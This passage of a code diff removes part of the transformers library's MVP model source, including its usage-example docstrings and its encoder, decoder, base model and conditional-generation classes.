`past_key_values` key value states are returned and can be used to speed up decoding (see - `past_key_values`). - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned - tensors for more detail. - output_hidden_states (`bool`, *optional*): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for - more detail. - return_dict (`bool`, *optional*): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. -""" - -MVP_CONDITIONAL_GENERATION_EXAMPLE = r""" - Example of summarization: - - Fine-tuning a model - ```python - >>> import torch - >>> from transformers import AutoTokenizer, MvpForConditionalGeneration - - >>> tokenizer = AutoTokenizer.from_pretrained("RUCAIBox/mvp") - >>> model = MvpForConditionalGeneration.from_pretrained("RUCAIBox/mvp") - - >>> inputs = tokenizer( - ... "Summarize: You may want to stick it to your boss and leave your job, but don't do it if these are your reasons.", - ... return_tensors="pt", - ... ) - >>> labels = tokenizer("Bad Reasons To Quit Your Job", return_tensors="pt")["input_ids"] - - >>> loss = model(**inputs, labels=labels).loss - >>> loss.backward() - ``` - - Inference after the model fine-tuned - ```python - >>> with torch.no_grad(): - ... 
generated_ids = model.generate(**inputs) - - >>> generated_text = tokenizer.batch_decode(generated_ids, skip_special_tokens=True) - ``` -""" - -MVP_SEQUENCE_CLASSIFICATION_SAMPLE = r""" - Example of single-label classification: - - Fine-tuning a model on `num_labels` classes - ```python - >>> import torch - >>> from transformers import AutoTokenizer, MvpForSequenceClassification - - >>> num_labels = 2 # for example, this is a binary classification task - >>> tokenizer = AutoTokenizer.from_pretrained("RUCAIBox/mvp") - >>> model = MvpForSequenceClassification.from_pretrained("RUCAIBox/mvp", num_labels=num_labels) - - >>> inputs = tokenizer("Classify: Hello, my dog is cute", return_tensors="pt") - >>> labels = torch.tensor(1) # the real label for inputs - - >>> loss = model(**inputs, labels=labels).loss - >>> loss.backward() - ``` - - Inference after the model fine-tuned - ```python - >>> with torch.no_grad(): - ... logits = model(**inputs).logits - - >>> predicted_class_id = logits.argmax() - ``` -""" - -MVP_QUESTION_ANSWERING_SAMPLE = r""" - Example: - - Fine-tuning a model for extrative question answering, and our model also supports generative question answering - using `BartForConditionalGeneration` - ```python - >>> import torch - >>> from transformers import AutoTokenizer, MvpForQuestionAnswering - - >>> tokenizer = AutoTokenizer.from_pretrained("RUCAIBox/mvp") - >>> model = MvpForQuestionAnswering.from_pretrained("RUCAIBox/mvp") - - >>> inputs = tokenizer( - ... "Answer the following question: Who was Jim Henson? [SEP] Jim Henson was a nice puppet", - ... return_tensors="pt", - ... ) - >>> target_start_index = torch.tensor([18]) - >>> target_end_index = torch.tensor([19]) - - >>> loss = model(**inputs, start_positions=target_start_index, end_positions=target_end_index).loss - >>> loss.backward() - ``` - - Inference after the model fine-tuned - ```python - >>> with torch.no_grad(): - ... outputs = model(**inputs) - - >>> answer_start_index = outputs.start_logits.argmax() - >>> answer_end_index = outputs.end_logits.argmax() - - >>> predict_answer_tokens = inputs.input_ids[0, answer_start_index : answer_end_index + 1] - >>> predict_answer = tokenizer.decode(predict_answer_tokens) - ``` -""" - - -class MvpEncoder(MvpPreTrainedModel): - """ - Transformer encoder consisting of *config.encoder_layers* self attention layers. Each layer is a - [`MvpEncoderLayer`]. 
- - Args: - config: MvpConfig - embed_tokens (nn.Embedding): output embedding - use_prompt (bool): whether to use prompt - """ - - def __init__( - self, config: MvpConfig, embed_tokens: Optional[nn.Embedding] = None, use_prompt: Optional[bool] = False - ): - super().__init__(config) - - self.dropout = config.dropout - self.layerdrop = config.encoder_layerdrop - - embed_dim = config.d_model - self.padding_idx = config.pad_token_id - self.max_source_positions = config.max_position_embeddings - self.embed_scale = math.sqrt(embed_dim) if config.scale_embedding else 1.0 - - if embed_tokens is not None: - self.embed_tokens = embed_tokens - else: - self.embed_tokens = nn.Embedding(config.vocab_size, embed_dim, self.padding_idx) - - self.embed_positions = MvpLearnedPositionalEmbedding( - config.max_position_embeddings, - embed_dim, - ) - self.layers = nn.ModuleList([MvpEncoderLayer(config) for _ in range(config.encoder_layers)]) - self.layernorm_embedding = nn.LayerNorm(embed_dim) - - self.use_prompt = use_prompt - if use_prompt: - self.prompt_length = config.prompt_length - self.self_attn_prompt = MvpPrompt( - config, - config.encoder_layers, - config.encoder_attention_heads, - ) - - self.gradient_checkpointing = False - # Initialize weights and apply final processing - self.post_init() - - def get_input_embeddings(self): - return self.embed_tokens - - def set_input_embeddings(self, value): - self.embed_tokens = value - - def forward( - self, - input_ids: torch.LongTensor = None, - attention_mask: Optional[torch.Tensor] = None, - head_mask: Optional[torch.Tensor] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, BaseModelOutput]: - r""" - Args: - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you - provide it. - - Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and - [`PreTrainedTokenizer.__call__`] for details. - - [What are input IDs?](../glossary#input-ids) - attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*): - Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`: - - - 1 for tokens that are **not masked**, - - 0 for tokens that are **masked**. - - [What are attention masks?](../glossary#attention-mask) - head_mask (`torch.Tensor` of shape `(encoder_layers, encoder_attention_heads)`, *optional*): - Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*): - Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. - This is useful if you want more control over how to convert `input_ids` indices into associated vectors - than the model's internal embedding lookup matrix. - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more detail. - output_hidden_states (`bool`, *optional*): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more detail. 
- return_dict (`bool`, *optional*): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - """ - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - # retrieve input_ids and inputs_embeds - if input_ids is not None and inputs_embeds is not None: - raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time") - elif input_ids is not None: - input = input_ids - input_shape = input.shape - input_ids = input_ids.view(-1, input_shape[-1]) - elif inputs_embeds is not None: - input_shape = inputs_embeds.size()[:-1] - input = inputs_embeds[:, :, -1] - else: - raise ValueError("You have to specify either input_ids or inputs_embeds") - - if inputs_embeds is None: - inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale - - embed_pos = self.embed_positions(input) - - hidden_states = inputs_embeds + embed_pos - hidden_states = self.layernorm_embedding(hidden_states) - hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training) - - # layer-wise prompt - if self.use_prompt: - prompt_ids = torch.arange(self.prompt_length).to(self.device) - self_attn_prompt = self.self_attn_prompt(prompt_ids) - - # expand attention_mask - if attention_mask is not None: - # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len] - attention_mask = _expand_mask(attention_mask, inputs_embeds.dtype) - - encoder_states = () if output_hidden_states else None - all_attentions = () if output_attentions else None - - # check if head_mask has a correct number of layers specified if desired - if head_mask is not None: - if head_mask.size()[0] != (len(self.layers)): - raise ValueError( - f"The head_mask should be specified for {len(self.layers)} layers, but it is for" - f" {head_mask.size()[0]}." 
- ) - - for idx, encoder_layer in enumerate(self.layers): - if output_hidden_states: - encoder_states = encoder_states + (hidden_states,) - # add LayerDrop (see https://arxiv.org/abs/1909.11556 for description) - to_drop = False - if self.training: - dropout_probability = torch.rand([]) - if dropout_probability < self.layerdrop: # skip the layer - to_drop = True - - if to_drop: - layer_outputs = (None, None) - else: - if self.gradient_checkpointing and self.training: - - def create_custom_forward(module): - def custom_forward(*inputs): - return module(*inputs, output_attentions) - - return custom_forward - - layer_outputs = torch.utils.checkpoint.checkpoint( - create_custom_forward(encoder_layer), - hidden_states, - attention_mask, - (head_mask[idx] if head_mask is not None else None), - (self_attn_prompt[idx] if self.use_prompt else None), - ) - else: - layer_outputs = encoder_layer( - hidden_states, - attention_mask, - layer_head_mask=(head_mask[idx] if head_mask is not None else None), - self_attn_prompt=(self_attn_prompt[idx] if self.use_prompt else None), - output_attentions=output_attentions, - ) - - hidden_states = layer_outputs[0] - - if output_attentions: - all_attentions = all_attentions + (layer_outputs[1],) - - if output_hidden_states: - encoder_states = encoder_states + (hidden_states,) - - if not return_dict: - return tuple(v for v in [hidden_states, encoder_states, all_attentions] if v is not None) - return BaseModelOutput( - last_hidden_state=hidden_states, hidden_states=encoder_states, attentions=all_attentions - ) - - -class MvpDecoder(MvpPreTrainedModel): - """ - Transformer decoder consisting of *config.decoder_layers* layers. Each layer is a [`MvpDecoderLayer`] - - Args: - config: MvpConfig - embed_tokens (nn.Embedding): output embedding - use_prompt (bool): whether to use prompt - """ - - def __init__( - self, config: MvpConfig, embed_tokens: Optional[nn.Embedding] = None, use_prompt: Optional[bool] = False - ): - super().__init__(config) - self.dropout = config.dropout - self.layerdrop = config.decoder_layerdrop - self.padding_idx = config.pad_token_id - self.max_target_positions = config.max_position_embeddings - self.embed_scale = math.sqrt(config.d_model) if config.scale_embedding else 1.0 - - if embed_tokens is not None: - self.embed_tokens = embed_tokens - else: - self.embed_tokens = nn.Embedding(config.vocab_size, config.d_model, self.padding_idx) - - self.embed_positions = MvpLearnedPositionalEmbedding( - config.max_position_embeddings, - config.d_model, - ) - self.layers = nn.ModuleList([MvpDecoderLayer(config) for _ in range(config.decoder_layers)]) - self.layernorm_embedding = nn.LayerNorm(config.d_model) - - self.use_prompt = use_prompt - if use_prompt: - self.prompt_length = config.prompt_length - self.self_attn_prompt = MvpPrompt( - config, - config.decoder_layers, - config.decoder_attention_heads, - ) - self.cross_attn_prompt = MvpPrompt( - config, - config.decoder_layers, - config.decoder_attention_heads, - ) - - self.gradient_checkpointing = False - # Initialize weights and apply final processing - self.post_init() - - def get_input_embeddings(self): - return self.embed_tokens - - def set_input_embeddings(self, value): - self.embed_tokens = value - - def _prepare_decoder_attention_mask(self, attention_mask, input_shape, inputs_embeds, past_key_values_length): - # create causal mask - # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len] - combined_attention_mask = None - if input_shape[-1] > 1: - combined_attention_mask = _make_causal_mask( - 
input_shape, - inputs_embeds.dtype, - device=inputs_embeds.device, - past_key_values_length=past_key_values_length, - ) - - if attention_mask is not None: - # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len] - expanded_attn_mask = _expand_mask(attention_mask, inputs_embeds.dtype, tgt_len=input_shape[-1]) - combined_attention_mask = ( - expanded_attn_mask if combined_attention_mask is None else expanded_attn_mask + combined_attention_mask - ) - - return combined_attention_mask - - def forward( - self, - input_ids: torch.LongTensor = None, - attention_mask: Optional[torch.Tensor] = None, - encoder_hidden_states: Optional[torch.FloatTensor] = None, - encoder_attention_mask: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.Tensor] = None, - cross_attn_head_mask: Optional[torch.Tensor] = None, - past_key_values: Optional[List[torch.FloatTensor]] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, BaseModelOutputWithPastAndCrossAttentions]: - r""" - Args: - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you - provide it. - - Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and - [`PreTrainedTokenizer.__call__`] for details. - - [What are input IDs?](../glossary#input-ids) - attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*): - Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`: - - - 1 for tokens that are **not masked**, - - 0 for tokens that are **masked**. - - [What are attention masks?](../glossary#attention-mask) - encoder_hidden_states (`torch.FloatTensor` of shape `(batch_size, encoder_sequence_length, hidden_size)`, *optional*): - Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention - of the decoder. - encoder_attention_mask (`torch.LongTensor` of shape `(batch_size, encoder_sequence_length)`, *optional*): - Mask to avoid performing cross-attention on padding tokens indices of encoder input_ids. Mask values - selected in `[0, 1]`: - - - 1 for tokens that are **not masked**, - - 0 for tokens that are **masked**. - - [What are attention masks?](../glossary#attention-mask) - head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*): - Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - cross_attn_head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*): - Mask to nullify selected heads of the cross-attention modules in the decoder to avoid performing - cross-attention on hidden heads. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. 
- - past_key_values (`tuple(tuple(torch.FloatTensor))`, *optional*, returned when `use_cache=True` is passed or when `config.use_cache=True`): - Tuple of `tuple(torch.FloatTensor)` of length `config.n_layers`, with each tuple having 2 tensors of - shape `(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional tensors of - shape `(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`. - - Contains pre-computed hidden-states (key and values in the self-attention blocks and in the - cross-attention blocks) that can be used (see `past_key_values` input) to speed up sequential decoding. - - If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those - that don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of - all `decoder_input_ids` of shape `(batch_size, sequence_length)`. inputs_embeds (`torch.FloatTensor` of - shape `(batch_size, sequence_length, hidden_size)`, *optional*): Optionally, instead of passing - `input_ids` you can choose to directly pass an embedded representation. This is useful if you want more - control over how to convert `input_ids` indices into associated vectors than the model's internal - embedding lookup matrix. - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more detail. - output_hidden_states (`bool`, *optional*): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more detail. - return_dict (`bool`, *optional*): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - """ - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - use_cache = use_cache if use_cache is not None else self.config.use_cache - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - # retrieve input_ids and inputs_embeds - if input_ids is not None and inputs_embeds is not None: - raise ValueError("You cannot specify both decoder_input_ids and decoder_inputs_embeds at the same time") - elif input_ids is not None: - input = input_ids - input_shape = input_ids.shape - input_ids = input_ids.view(-1, input_shape[-1]) - elif inputs_embeds is not None: - input_shape = inputs_embeds.size()[:-1] - input = inputs_embeds[:, :, -1] - else: - raise ValueError("You have to specify either decoder_input_ids or decoder_inputs_embeds") - - # past_key_values_length - past_key_values_length = past_key_values[0][0].shape[2] if past_key_values is not None else 0 - - if inputs_embeds is None: - inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale - - attention_mask = self._prepare_decoder_attention_mask( - attention_mask, input_shape, inputs_embeds, past_key_values_length - ) - - # expand encoder attention mask - if encoder_hidden_states is not None and encoder_attention_mask is not None: - # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len] - encoder_attention_mask = _expand_mask(encoder_attention_mask, inputs_embeds.dtype, tgt_len=input_shape[-1]) - - # embed positions - positions = self.embed_positions(input, past_key_values_length) - - hidden_states = inputs_embeds + positions - hidden_states = self.layernorm_embedding(hidden_states) - - hidden_states = 
nn.functional.dropout(hidden_states, p=self.dropout, training=self.training) - - # layer-wise prompt - if self.use_prompt: - prompt_ids = torch.arange(self.prompt_length).to(self.device) - self_attn_prompt = self.self_attn_prompt(prompt_ids) - cross_attn_prompt = self.cross_attn_prompt(prompt_ids) - - if self.gradient_checkpointing and self.training: - if use_cache: - logger.warning_once( - "`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`..." - ) - use_cache = False - - # decoder layers - all_hidden_states = () if output_hidden_states else None - all_self_attns = () if output_attentions else None - all_cross_attentions = () if (output_attentions and encoder_hidden_states is not None) else None - next_decoder_cache = () if use_cache else None - - # check if head_mask/cross_attn_head_mask has a correct number of layers specified if desired - for attn_mask, mask_name in zip([head_mask, cross_attn_head_mask], ["head_mask", "cross_attn_head_mask"]): - if attn_mask is not None: - if attn_mask.size()[0] != (len(self.layers)): - raise ValueError( - f"The `{mask_name}` should be specified for {len(self.layers)} layers, but it is for" - f" {head_mask.size()[0]}." - ) - - for idx, decoder_layer in enumerate(self.layers): - # add LayerDrop (see https://arxiv.org/abs/1909.11556 for description) - if output_hidden_states: - all_hidden_states += (hidden_states,) - if self.training: - dropout_probability = torch.rand([]) - if dropout_probability < self.layerdrop: - continue - - past_key_value = past_key_values[idx] if past_key_values is not None else None - - if self.gradient_checkpointing and self.training: - - def create_custom_forward(module): - def custom_forward(*inputs): - # None for past_key_value - return module(*inputs, output_attentions, use_cache) - - return custom_forward - - layer_outputs = torch.utils.checkpoint.checkpoint( - create_custom_forward(decoder_layer), - hidden_states, - attention_mask, - encoder_hidden_states, - encoder_attention_mask, - head_mask[idx] if head_mask is not None else None, - cross_attn_head_mask[idx] if cross_attn_head_mask is not None else None, - self_attn_prompt[idx] if self.use_prompt else None, - cross_attn_prompt[idx] if self.use_prompt else None, - None, - ) - else: - layer_outputs = decoder_layer( - hidden_states, - attention_mask=attention_mask, - encoder_hidden_states=encoder_hidden_states, - encoder_attention_mask=encoder_attention_mask, - layer_head_mask=(head_mask[idx] if head_mask is not None else None), - cross_attn_layer_head_mask=( - cross_attn_head_mask[idx] if cross_attn_head_mask is not None else None - ), - self_attn_prompt=(self_attn_prompt[idx] if self.use_prompt else None), - cross_attn_prompt=(cross_attn_prompt[idx] if self.use_prompt else None), - past_key_value=past_key_value, - output_attentions=output_attentions, - use_cache=use_cache, - ) - hidden_states = layer_outputs[0] - - if use_cache: - next_decoder_cache += (layer_outputs[3 if output_attentions else 1],) - - if output_attentions: - all_self_attns += (layer_outputs[1],) - - if encoder_hidden_states is not None: - all_cross_attentions += (layer_outputs[2],) - - # add hidden states from the last decoder layer - if output_hidden_states: - all_hidden_states += (hidden_states,) - - next_cache = next_decoder_cache if use_cache else None - if not return_dict: - return tuple( - v - for v in [hidden_states, next_cache, all_hidden_states, all_self_attns, all_cross_attentions] - if v is not None - ) - return BaseModelOutputWithPastAndCrossAttentions( 
- last_hidden_state=hidden_states, - past_key_values=next_cache, - hidden_states=all_hidden_states, - attentions=all_self_attns, - cross_attentions=all_cross_attentions, - ) - - -@add_start_docstrings( - "The bare MVP Model outputting raw hidden-states without any specific head on top.", - MVP_START_DOCSTRING, -) -class MvpModel(MvpPreTrainedModel): - _keys_to_ignore_on_load_unexpected = ["final_logits_bias"] - _tied_weights_keys = ["encoder.embed_tokens.weight", "decoder.embed_tokens.weight"] - - def __init__(self, config: MvpConfig): - super().__init__(config) - - padding_idx, vocab_size = config.pad_token_id, config.vocab_size - self.use_prompt = config.use_prompt - self.shared = nn.Embedding(vocab_size, config.d_model, padding_idx) - - self.encoder = MvpEncoder(config, self.shared, config.use_prompt) - self.decoder = MvpDecoder(config, self.shared, config.use_prompt) - - # Initialize weights and apply final processing - self.post_init() - - def get_input_embeddings(self): - return self.shared - - def set_input_embeddings(self, value): - self.shared = value - self.encoder.embed_tokens = self.shared - self.decoder.embed_tokens = self.shared - - def get_encoder(self): - return self.encoder - - def get_decoder(self): - return self.decoder - - def set_lightweight_tuning(self): - assert self.use_prompt, "If you want to use lightweight tuning, make sure that `use_prompt=True`." - - self.requires_grad_(False) - self.encoder.self_attn_prompt.requires_grad_(True) - self.decoder.self_attn_prompt.requires_grad_(True) - self.decoder.cross_attn_prompt.requires_grad_(True) - - @add_start_docstrings_to_model_forward(MVP_INPUTS_DOCSTRING) - @add_code_sample_docstrings( - checkpoint=_CHECKPOINT_FOR_DOC, - output_type=Seq2SeqModelOutput, - config_class=_CONFIG_FOR_DOC, - expected_output=_EXPECTED_OUTPUT_SHAPE, - ) - def forward( - self, - input_ids: torch.LongTensor = None, - attention_mask: Optional[torch.Tensor] = None, - decoder_input_ids: Optional[torch.LongTensor] = None, - decoder_attention_mask: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.Tensor] = None, - decoder_head_mask: Optional[torch.Tensor] = None, - cross_attn_head_mask: Optional[torch.Tensor] = None, - encoder_outputs: Optional[List[torch.FloatTensor]] = None, - past_key_values: Optional[List[torch.FloatTensor]] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - decoder_inputs_embeds: Optional[torch.FloatTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, Seq2SeqModelOutput]: - # different to other models, Mvp automatically creates decoder_input_ids from - # input_ids if no decoder_input_ids are provided - if decoder_input_ids is None and decoder_inputs_embeds is None: - if input_ids is None: - raise ValueError( - "If no `decoder_input_ids` or `decoder_inputs_embeds` are " - "passed, `input_ids` cannot be `None`. Please pass either " - "`input_ids` or `decoder_input_ids` or `decoder_inputs_embeds`." 
- ) - - decoder_input_ids = shift_tokens_right( - input_ids, self.config.pad_token_id, self.config.decoder_start_token_id - ) - - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - use_cache = use_cache if use_cache is not None else self.config.use_cache - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - if encoder_outputs is None: - encoder_outputs = self.encoder( - input_ids=input_ids, - attention_mask=attention_mask, - head_mask=head_mask, - inputs_embeds=inputs_embeds, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - # If the user passed a tuple for encoder_outputs, we wrap it in a BaseModelOutput when return_dict=True - elif return_dict and not isinstance(encoder_outputs, BaseModelOutput): - encoder_outputs = BaseModelOutput( - last_hidden_state=encoder_outputs[0], - hidden_states=encoder_outputs[1] if len(encoder_outputs) > 1 else None, - attentions=encoder_outputs[2] if len(encoder_outputs) > 2 else None, - ) - - # decoder outputs consists of (dec_features, past_key_value, dec_hidden, dec_attn) - decoder_outputs = self.decoder( - input_ids=decoder_input_ids, - attention_mask=decoder_attention_mask, - encoder_hidden_states=encoder_outputs[0], - encoder_attention_mask=attention_mask, - head_mask=decoder_head_mask, - cross_attn_head_mask=cross_attn_head_mask, - past_key_values=past_key_values, - inputs_embeds=decoder_inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - - if not return_dict: - return decoder_outputs + encoder_outputs - - return Seq2SeqModelOutput( - last_hidden_state=decoder_outputs.last_hidden_state, - past_key_values=decoder_outputs.past_key_values, - decoder_hidden_states=decoder_outputs.hidden_states, - decoder_attentions=decoder_outputs.attentions, - cross_attentions=decoder_outputs.cross_attentions, - encoder_last_hidden_state=encoder_outputs.last_hidden_state, - encoder_hidden_states=encoder_outputs.hidden_states, - encoder_attentions=encoder_outputs.attentions, - ) - - -@add_start_docstrings( - "The MVP Model with a language modeling head. 
Can be used for various text generation tasks.", MVP_START_DOCSTRING -) -class MvpForConditionalGeneration(MvpPreTrainedModel): - _tied_weights_keys = ["encoder.embed_tokens.weight", "decoder.embed_tokens.weight", "lm_head.weight"] - - def __init__(self, config: MvpConfig): - super().__init__(config) - self.model = MvpModel(config) - self.register_buffer("final_logits_bias", torch.zeros((1, self.model.shared.num_embeddings))) - self.lm_head = nn.Linear(config.d_model, self.model.shared.num_embeddings, bias=False) - - # Initialize weights and apply final processing - self.post_init() - - def get_encoder(self): - return self.model.get_encoder() - - def get_decoder(self): - return self.model.get_decoder() - - def resize_token_embeddings(self, new_num_tokens: int, pad_to_multiple_of: Optional[int] = None) -> nn.Embedding: - new_embeddings = super().resize_token_embeddings(new_num_tokens, pad_to_multiple_of) - self._resize_final_logits_bias(new_num_tokens) - return new_embeddings - - def _resize_final_logits_bias(self, new_num_tokens: int) -> None: - old_num_tokens = self.final_logits_bias.shape[-1] - if new_num_tokens <= old_num_tokens: - new_bias = self.final_logits_bias[:, :new_num_tokens] - else: - extra_bias = torch.zeros((1, new_num_tokens - old_num_tokens), device=self.final_logits_bias.device) - new_bias = torch.cat([self.final_logits_bias, extra_bias], dim=1) - self.register_buffer("final_logits_bias", new_bias) - - def get_output_embeddings(self): - return self.lm_head - - def set_output_embeddings(self, new_embeddings): - self.lm_head = new_embeddings - - def set_lightweight_tuning(self): - self.model.set_lightweight_tuning() - self.lm_head.requires_grad_(False) - - @add_start_docstrings_to_model_forward(MVP_INPUTS_DOCSTRING) - @replace_return_docstrings(output_type=Seq2SeqLMOutput, config_class=_CONFIG_FOR_DOC) - @add_end_docstrings(MVP_CONDITIONAL_GENERATION_EXAMPLE) - def forward( - self, - input_ids: torch.LongTensor = None, - attention_mask: Optional[torch.Tensor] = None, - decoder_input_ids: Optional[torch.LongTensor] = None, - decoder_attention_mask: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.Tensor] = None, - decoder_head_mask: Optional[torch.Tensor] = None, - cross_attn_head_mask: Optional[torch.Tensor] = None, - encoder_outputs: Optional[List[torch.FloatTensor]] = None, - past_key_values: Optional[List[torch.FloatTensor]] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - decoder_inputs_embeds: Optional[torch.FloatTensor] = None, - labels: Optional[torch.LongTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, Seq2SeqLMOutput]: - r""" - labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*): - Labels for computing the masked language modeling loss. Indices should either be in `[0, ..., - config.vocab_size]` or -100 (see `input_ids` docstring). Tokens with indices set to `-100` are ignored - (masked), the loss is only computed for the tokens with labels in `[0, ..., config.vocab_size]`. 
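        When `labels` are provided and `decoder_input_ids` are not, the decoder inputs are created by shifting the
        labels one position to the right with `shift_tokens_right` (defined in this module, as for other BART-like
        models). A sketch of that behavior with illustrative token ids:

        ```python
        >>> import torch
        >>> from transformers.models.mvp.modeling_mvp import shift_tokens_right

        >>> labels = torch.tensor([[42, 43, 2]])  # illustrative ids, 2 = eos
        >>> shift_tokens_right(labels, 1, 2).tolist()  # pad_token_id=1, decoder_start_token_id=2
        [[2, 42, 43]]
        ```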
- - Returns: - """ - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - if labels is not None: - if use_cache: - logger.warning("The `use_cache` argument is changed to `False` since `labels` is provided.") - use_cache = False - if decoder_input_ids is None and decoder_inputs_embeds is None: - decoder_input_ids = shift_tokens_right( - labels, self.config.pad_token_id, self.config.decoder_start_token_id - ) - - outputs = self.model( - input_ids, - attention_mask=attention_mask, - decoder_input_ids=decoder_input_ids, - encoder_outputs=encoder_outputs, - decoder_attention_mask=decoder_attention_mask, - head_mask=head_mask, - decoder_head_mask=decoder_head_mask, - cross_attn_head_mask=cross_attn_head_mask, - past_key_values=past_key_values, - inputs_embeds=inputs_embeds, - decoder_inputs_embeds=decoder_inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - lm_logits = self.lm_head(outputs[0]) + self.final_logits_bias - - masked_lm_loss = None - if labels is not None: - loss_fct = CrossEntropyLoss() - masked_lm_loss = loss_fct(lm_logits.view(-1, self.config.vocab_size), labels.view(-1)) - - if not return_dict: - output = (lm_logits,) + outputs[1:] - return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output - - return Seq2SeqLMOutput( - loss=masked_lm_loss, - logits=lm_logits, - past_key_values=outputs.past_key_values, - decoder_hidden_states=outputs.decoder_hidden_states, - decoder_attentions=outputs.decoder_attentions, - cross_attentions=outputs.cross_attentions, - encoder_last_hidden_state=outputs.encoder_last_hidden_state, - encoder_hidden_states=outputs.encoder_hidden_states, - encoder_attentions=outputs.encoder_attentions, - ) - - def prepare_inputs_for_generation( - self, - decoder_input_ids, - past_key_values=None, - attention_mask=None, - head_mask=None, - decoder_head_mask=None, - cross_attn_head_mask=None, - use_cache=None, - encoder_outputs=None, - **kwargs, - ): - # cut decoder_input_ids if past is used - if past_key_values is not None: - decoder_input_ids = decoder_input_ids[:, -1:] - - return { - "input_ids": None, # encoder_outputs is defined. input_ids not needed - "encoder_outputs": encoder_outputs, - "past_key_values": past_key_values, - "decoder_input_ids": decoder_input_ids, - "attention_mask": attention_mask, - "head_mask": head_mask, - "decoder_head_mask": decoder_head_mask, - "cross_attn_head_mask": cross_attn_head_mask, - "use_cache": use_cache, # change this to avoid caching (presumably for debugging) - } - - def prepare_decoder_input_ids_from_labels(self, labels: torch.Tensor): - return shift_tokens_right(labels, self.config.pad_token_id, self.config.decoder_start_token_id) - - @staticmethod - def _reorder_cache(past_key_values, beam_idx): - reordered_past = () - for layer_past in past_key_values: - # cached cross_attention states don't have to be reordered -> they are always the same - reordered_past += ( - tuple(past_state.index_select(0, beam_idx.to(past_state.device)) for past_state in layer_past[:2]) - + layer_past[2:], - ) - return reordered_past - - -@add_start_docstrings( - """ - Mvp model with a sequence classification/head on top (a linear layer on top of the pooled output) e.g. for GLUE - tasks. 
